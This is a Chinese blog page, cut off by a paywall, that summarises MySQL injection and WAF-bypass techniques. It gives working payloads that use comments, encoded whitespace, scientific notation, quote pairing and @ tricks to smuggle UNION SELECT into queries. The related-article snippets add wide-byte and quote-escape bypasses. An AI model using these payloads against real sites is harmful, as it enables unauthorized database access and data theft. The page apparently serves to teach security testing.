单引号 绕过 mysql_MySQL绕过小结

最新推荐文章于 2024-04-10 21:32:12 发布
最新推荐文章于 2024-04-10 21:32:12 发布
阅读量1k 收藏 4
点赞数
文章标签: 单引号 绕过 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33214011/article/details/113710699
版权

0x01 前言

最近在网上搜集学习到关于 mysql 注入的操作,故做一个小总结。

0x02 测试

我的WafBypass之道 (SQL注入篇)这篇文章结尾部分提到的,把每个 SQL 关键字两侧可插入的点称之为”位“,类似下图:

20201108164132-34146e88-219e-1.png

我要总结的这些操作,也是围着这五个位,下面开始。

位置一

(1)注释符

/**/ %23 --+ /*!50000union*/

id=2/**/union select 1,user,3 from admin

(2)空白符

%09,%0a,%0b,%0c,%0d,%20,%a0

id= 1 %0a union select 1,user,3 from admin

(3)科学计算法

e .

id= 2e0 union select 1,user,3 from admin

id= 1.union select 1,user,3 from admin

id= 1.1union select 1,user,3 from admin

还有%1%2E %2%2E %3%2E

id= 1' %1%2Eunion select user(),2 %23

(4)单引号双引号

id= 1' 'xx'union select user(),2 %23

id= 1' ""union select user(),2 %23

需要闭合的先闭合,然后成对使用单双引号

(5)x@

假设SQL语句为:select * from article where id = '2'

%@ *@ -@ +@ /@ @ ^@ |@ %26@ -@'' -@"" -@@new

id=' -@ union select 1,2 ,3 %23

id=' %26

最低0.47元/天 解锁文章
红烧肉数分
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的
MySQL魔术引号绕过
qq_39654116的博客
01-05 1469
目录绕过魔术引号简介绕过 绕过魔术引号 简介 现在的WEB程序基本都有对SQL注入的全局过滤,运维人员配置PHP环境是一般会开启魔术引号GPC,即magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了,所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发,对GET、POST和COOKIE等
SQL注入---字符绕过
最新发布
zhoutong2323的博客
04-10 801
当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入:
sql宽字节注入,绕过单引号
weixin_34149796的博客
08-04 1721
参加下面: http://leapar.lofter.com/post/122a03_3028a9 http://huaidan.org/archives/2268.html   https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
mysql 过滤单引号_python实现mysql单引号字符串过滤方法
weixin_42511712的博客
02-27 106
本文实例讲述了python实现mysql单引号字符串过滤方法。分享给大家供大家参考,具体如下:最主要用这个函数,可以处理MySQLdb.escape_string(content).class Guide:def __init__(self):self.time_zone = 7*3600 #设置时区self.now_time = int(time.time()) + self.time_zon...
mysql注入绕过单引号_SQL注入绕过PHP单引号字符转义原理及预防方法
weixin_39535287的博客
01-19 1416
http://mo47.com/blog/2011/sql_injection_gpc利用GBK双字节编码,绕过单引号转义PHP测试代码如下/* 注入实验:start */$id = $_GET['id'];//建立连接$conn = false;$conn = mysql_connect("localhost","root","");mysql_query("set names 'gbk'");...
MySQL concat里面使用多个单引号,三引号的问题
09-08
今天小编就为大家分享一篇在MySQL concat里面使用多个单引号,三引号的问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
关于Mysql查询带单引号及插入带单引号字符串问题
09-10
MySQL查询中,正确处理带有单引号的字符串至关重要,因为单引号是SQL语句中的特殊字符,未正确处理可能导致语法错误或者更严重的安全问题,如SQL注入攻击。SQL注入是恶意用户通过输入带有特殊SQL命令的数据来操纵...
一个单引号引发的MYSQL性能问题分析
09-11
MySQL数据库中,单引号的使用在某些情况下会对查询性能产生显著影响。这个问题主要涉及到数据类型和索引的使用。标题提到的“一个单引号引发的MYSQL性能问题分析”实际上是指在查询字符串类型主键时,是否使用单...
单引号 绕过 mysql_通用的关于sql注入的绕过技巧(利用mysql的特性)
weixin_33182798的博客
01-19 716
1直接上语法2select*fromuserswhereid=8E0unionselect1,2,3,4,5,6,7,8,9,03select*fromuserswhereid=8.0unionselect1,2,3,4,5,6,7,8,9,04select*fromuserswhereid=\Nunionselect1,2,3,4,5,6,7,8...
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8264
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
php 单引号绕过,利用UTF8字节编码能否绕过PHP单引号转义进行注入?
weixin_30914751的博客
03-13 647
利用GBK双字节编码可以绕过单引号转义进行注入,这在之前的文章中已经分析过了(《利用GBK双字节编码突破PHP单引号转义限制进行SQL注入》,http://www.redicecn.com/html/wangluoanquan/20101018/180.html)。今天来讨论一下是否能够利用UTF8字节编码绕过转义。先回顾一下GBK编码绕转义的原理:GBK编码的字节范围是:首字节:0x81-0xF...
mysql 注释 绕过_MySQL绕过小结
weixin_35657099的博客
01-20 305
0x01 前言最近在网上搜集学习到关于 mysql 注入的操作,故做一个小总结。0x02 测试我的WafBypass之道 (SQL注入篇)这篇文章结尾部分提到的,把每个 SQL 关键字两侧可插入的点称之为”位“,类似下图:我要总结的这些操作,也是围着这五个位,下面开始。位置一(1)注释符/**/ %23 --+ /*!50000union*/id=2/**/union select 1,user...
MySQL注入绕过
tcsecXD的博客
03-24 391
本文主要结合本人绕过最近某rasp和一些waf的经验,分享绕过waf的思路,MySQL测试版本(8.0.31)。
SQL注入 引号转义绕过
热门推荐
Auroraxsn的博客
04-25 1万+
问题描述 做了一个靶场,注入点为数字类型,一开始一帆风顺,直到爆破列名的时候突然报错,页面突然就没了,毫无征兆...报错时的url如下: ?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users" 查看源码: $sql="SELECT * FROM users wher
sql注入绕过(随时更新)
D1stiny的博客
04-03 9557
注入绕过有很多很多种,原理基本类似,在我看来有函数过滤和字符过滤两种。(因为比较菜,所以目前只讲一下字符过滤好了) 这里我选择的是根据实例进行解释(更适合小白)(会在最后进行总结,把各种方式都列出来的) 0x01(这里跟一下隔壁的风) 字符过滤,顾名思义,就是把可能在注入中出现一些字符过滤掉以此来防止注入。 那么问题来了,怎么看他是把哪种字符给过滤了呢? 在之前,我以为是通过报错才进行判断,接触...
注入的花式绕过姿势--向鸡哥学习
Assassin
07-16 3428
打了一次比赛,大佬们都说简单,我却什么都做不出来,真心受伤的一逼,是时候学习一波大佬的经验了,本次主要想要抄袭一下鸡哥的what a fuck总结,嗯嗯. 1.WAF绕过姿势 (1)大小写绕过 SQL语句中对大小写没有限制,但是PHP中函数经常对大小写敏感,所以用到的地方较少。 (2)双关键字 有一种waf保护的方法是删除select 、 union等关键字,所以有时用两遍可
sql注入常见绕过方法
ljlrookiebird的博客
09-05 3769
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
WAF详解及WAF绕过
赤赤三的博客
03-20 8704
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
sql注入绕过单引号
05-26
在 SQL 注入中,绕过单引号的一种方法是使用双单引号代替单引号。例如,如果注入点是在用户名字段中,想要注入一个值为 "admin' OR '1'='1" 的字符串,可以将其改写为 "admin'' OR ''1''=''1"。这样,SQL 语句将会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值